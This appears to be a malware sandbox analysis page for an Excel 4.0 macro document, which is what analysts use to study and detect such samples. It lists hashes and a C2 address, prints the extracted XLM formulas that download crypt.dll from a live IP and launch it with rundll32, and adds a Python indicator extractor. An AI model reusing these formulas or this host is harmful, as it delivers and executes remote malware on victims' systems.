General

  • Target

    b2e3db73090c109809bbb28da178f760_JaffaCakes118

  • Size

    101KB

  • MD5

    b2e3db73090c109809bbb28da178f760

  • SHA1

    51961d5e0b552133a446378bbf80ee74f11f1e4d

  • SHA256

    e47b43a0ad9ab160598d8756a5fb9904668a1ba419c6b280bcc04b5dfb152672

  • SHA512

    71f4c0aee4e589f7eead92881113c4de925ec634aa5737cb5422a5b99cfa468a396080398f651090d43e7d881ba999f2696b3f158348f8f2791ddf0c8752d596

  • SSDEEP

    3072:JQxEtjPOtioVjDGUU1qfDlaGGx+cL2QnABtQ/XsfEABhnz2JNpfPNGN7F:6xEtjPOtioVjDGUU1qfDlavx+W2QnAmA

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://209.141.54.161/crypt.dll

Attributes
  • formulas

    =CALL("Kernel32","CreateDirectoryA","JCJ","C:\rncwner",0)
    =CALL("Kernel32","CreateDirectoryA","JCJ","C:\rncwner\CkkYKlI",0)
    =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://209.141.54.161/crypt.dll","C:\rncwner\CkkYKlI\UiQhTXx.dll",0,0)
    =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","rundll32.exe","C:\rncwner\CkkYKlI\UiQhTXx.dll DllRegisterServer",0,0)
    =HALT()
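The formulas above are a classic XLM download-and-execute chain: two CreateDirectoryA calls stage a directory, URLDownloadToFileA fetches crypt.dll into it, and ShellExecuteA launches it through rundll32.exe with the DllRegisterServer export. In a =CALL() formula the third argument is the type string for the imported function (J is a 4-byte integer, C a null-terminated string), which is why the signatures read "JCJ", "JJCCJJ" and "JJCCCCJ". The following is an added example, not the sandbox's extractor and not code from the sample: it assumes the macro cells have already been dumped to text (olevba and XLMMacroDeobfuscator both emit per-cell formula listings) and shows how to parse the CALL formulas, collect the URL, paths and command line as indicators, and flag the fetched-then-executed pattern. The input list is constructed from the formulas on this page.

```python
"""Parse Excel 4.0 (XLM) =CALL() formulas and pull indicators out of them.

Added example; it is not the sandbox's own rule. It works on formulas that an
XLM extractor has already dumped as text, one formula per string.
"""
import re

# Constructed input: the formulas listed on this page, in the reported order.
SAMPLE_FORMULAS = [
    r'=CALL("Kernel32","CreateDirectoryA","JCJ","C:\rncwner",0)',
    r'=CALL("Kernel32","CreateDirectoryA","JCJ","C:\rncwner\CkkYKlI",0)',
    r'=CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://209.141.54.161/crypt.dll","C:\rncwner\CkkYKlI\UiQhTXx.dll",0,0)',
    r'=CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","rundll32.exe","C:\rncwner\CkkYKlI\UiQhTXx.dll DllRegisterServer",0,0)',
    r'=HALT()',
]

URL_RE = re.compile(r'https?://[^\s",]+', re.I)
WINPATH_RE = re.compile(r'[A-Za-z]:\\[^\s",]+')


def split_args(body):
    """Split a CALL argument list on commas that sit outside double quotes."""
    args, cur, in_str = [], [], False
    for ch in body:
        if ch == '"':
            in_str = not in_str
            cur.append(ch)
        elif ch == ',' and not in_str:
            args.append(''.join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    args.append(''.join(cur).strip())
    return args


def unquote(token):
    """Strip the quotes of an XLM string literal; a doubled quote escapes one quote."""
    if len(token) >= 2 and token[0] == '"' and token[-1] == '"':
        return token[1:-1].replace('""', '"')
    return token


def parse_call(formula):
    """Return (library, function, type_string, args) for a =CALL(...) formula, else None."""
    m = re.fullmatch(r'\s*=CALL\((.*)\)\s*', formula, re.S)
    if not m:
        return None
    parts = [unquote(p) for p in split_args(m.group(1))]
    if len(parts) < 3:
        return None
    return parts[0], parts[1], parts[2], parts[3:]


def extract_iocs(formulas):
    """Walk the formulas in order; collect the API sequence, URLs, paths, downloads and commands."""
    urls, paths = [], []
    result = {"sequence": [], "urls": urls, "paths": paths, "downloads": [], "commands": []}
    for f in formulas:
        call = parse_call(f)
        if call is None:          # =HALT(), =EXEC-free cells, plain values, etc.
            continue
        lib, func, _types, args = call
        result["sequence"].append(f"{lib}!{func}")
        for a in args:
            for u in URL_RE.findall(a):
                if u not in urls:
                    urls.append(u)
            for p in WINPATH_RE.findall(a):
                if p not in paths:
                    paths.append(p)
        # URLDownloadToFile(pCaller, szURL, szFileName, dwReserved, lpfnCB)
        if func.lower().startswith("urldownloadtofile") and len(args) >= 3:
            result["downloads"].append((args[1], args[2]))
        # ShellExecute(hwnd, lpOperation, lpFile, lpParameters, lpDirectory, nShowCmd)
        if func.lower().startswith("shellexecute") and len(args) >= 4:
            result["commands"].append(f"{args[2]} {args[3]}".strip())
    return result


def is_download_execute_chain(iocs):
    """True when a file written by URLDownloadToFile later appears in a ShellExecute command line."""
    targets = [path.lower() for _url, path in iocs["downloads"]]
    return any(t in cmd.lower() for t in targets for cmd in iocs["commands"])


if __name__ == "__main__":
    found = extract_iocs(SAMPLE_FORMULAS)
    for key, value in found.items():
        print(f"{key}: {value}")
    print("download-and-execute chain:", is_download_execute_chain(found))
```

Running it on the constructed list yields the single C2 URL, the three staged paths, the (URL, local file) download pair and the rundll32 command line, and the chain check returns True because the downloaded path reappears in the ShellExecuteA parameters. The same parser handles =CALL() cells from other XLM samples; only the indicator classification (URL, drive-letter path, download pair, command) is tied to the APIs seen here.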

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with Excel 4.0 (XLM) macros.

Files

  • b2e3db73090c109809bbb28da178f760_JaffaCakes118
    .xls windows office2003